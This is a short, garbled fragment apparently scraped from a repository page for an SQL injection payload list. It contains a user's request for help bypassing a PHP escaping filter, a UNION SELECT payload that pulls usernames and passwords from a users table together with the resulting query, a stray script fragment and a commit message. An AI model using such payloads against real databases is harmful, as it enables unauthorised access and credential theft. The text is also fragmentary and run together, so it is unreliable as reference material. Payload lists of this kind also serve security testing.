sql-injection-payload-list
sql-injection-payload-list copied to clipboard
🎯 SQL Injection Payload List
I
I
I'm having a problem bypassing filter. ``` function filter($input) { if(get_magic_quotes_gpc()) $input= stripslashes($input); $input = mysql_real_escape_string($input); return $input; } ``` so the filter uses stripslashes & mysql_real_escape_string which makes it...
1' UNION SELECT username, password FROM users--SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT username, password FROM users--All passwordsAll usernames
document.write('');
Added few extra payloads